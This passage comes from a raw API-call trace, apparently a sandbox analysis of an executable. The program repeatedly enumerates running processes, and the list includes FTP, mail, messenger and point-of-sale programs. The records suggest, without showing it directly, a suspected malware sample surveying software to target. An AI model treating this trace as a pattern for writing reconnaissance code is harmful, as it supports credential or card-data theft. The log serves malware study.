cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0266.537] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0266.539] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0266.540] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0266.591] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0266.593] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0266.595] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0266.597] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0266.599] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0266.601] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0266.603] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0266.616] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0266.618] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0266.620] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0266.622] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0266.623] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0266.625] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0266.627] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0266.628] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0266.630] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0266.631] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0266.633] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0266.635] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0266.647] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0266.649] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0266.650] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0266.652] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0266.659] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0266.662] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0266.664] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0266.666] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0266.671] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0266.672] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0266.674] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0266.676] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0266.678] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0266.679] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0266.681] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0266.685] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0266.687] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0266.689] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0266.690] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0266.692] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0266.694] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0266.695] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0266.697] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0266.751] CloseHandle (hObject=0x1018) returned 1 [0266.751] Sleep (dwMilliseconds=0x64) [0266.860] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0266.870] Process32First (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.875] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0266.877] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0266.879] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0266.880] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0266.882] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0266.883] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0266.885] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0266.887] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0266.890] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.892] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.893] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0266.894] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.896] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.897] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.898] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.900] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.942] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.944] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.945] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0266.947] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0266.951] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0266.952] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.954] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0266.955] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0266.957] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0266.958] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0266.960] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0266.961] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.963] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0266.967] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0266.968] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0266.970] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0266.971] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0266.973] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0266.974] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0266.976] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0266.977] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0266.995] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, 